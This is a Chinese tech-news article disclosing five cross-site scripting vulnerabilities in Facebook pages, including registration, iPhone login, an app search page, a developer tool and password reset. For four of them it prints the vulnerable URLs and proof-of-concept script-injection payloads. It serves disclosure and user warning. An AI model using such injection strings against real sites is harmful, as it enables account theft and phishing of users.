扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户,例如散播恶意软件、广告软件和间谍软件等等。拜这些高危跨站点脚本攻击漏洞所赐,Facebook用户可能受到钓鱼攻击并导致ID失窃。截至本月5号为止,这些漏洞尚未得到修复,这些高危漏洞已经对用户的隐私构成了高度的威胁。
安全研究人员最近发现的有XSS漏洞的页面包括,开发人员页面、新用户注册页面、iphone登录页面以及应用程序页面。攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户,例如散播恶意软件、广告软件和间谍软件等等。对于用户来说,为了远离这些威胁的攻击最好不要接受不认识的人员加为好友的请求,千万不要点击不明来源的链接。
原因是Facebook的个人概况中包含了许多个人信息,“好友”通过则这些信息足以发动有针对性的钓鱼攻击,或者向您发送有针对性的垃圾邮件。但是如果您点击了一个共享链接结果会怎样呢?很明显,对他们来说,您就不会有什么隐私了!!!为了安全和隐私起见,一定要注意您在社交网络上的个人简介。
下面我们对这些最新漏洞分析进行介绍:
1号XSS漏洞:
所在位置:http://www.new.facebook.com/r.php
问题页面的镜像:http://www.xssed.com/mirror/50947/
攻击性POST:reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar
2号XSS漏洞
所在位置:
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
问题页面的镜像:http://www.xssed.com/mirror/53885/
攻击性POST:
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login
3号XSS漏洞
所在位置及攻击字符串:
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
问题页面的镜像:http://www.xssed.com/mirror/55268/
4号XSS漏洞
所在位置:http://developers.facebook.com/tools.php?fbml
问题页面的镜像:http://www.xssed.com/mirror/55392/
攻击性POST:
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Hey you all! Our best wishes for 2009!!! :) ;)
5号XSS漏洞
这是Facebook的Reset Password页面近期再次出现危险的跨站点脚本攻击安全漏洞。恶意用户可以网其中诸如代码并窃取数以百万计的Facebook用户的敏感个人信息。但愿这个漏洞能够得到迅速修复,好在以前他们的反应还是很迅速的。
问题页面的镜像:
http://www.xssed.com/mirror/55951/
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者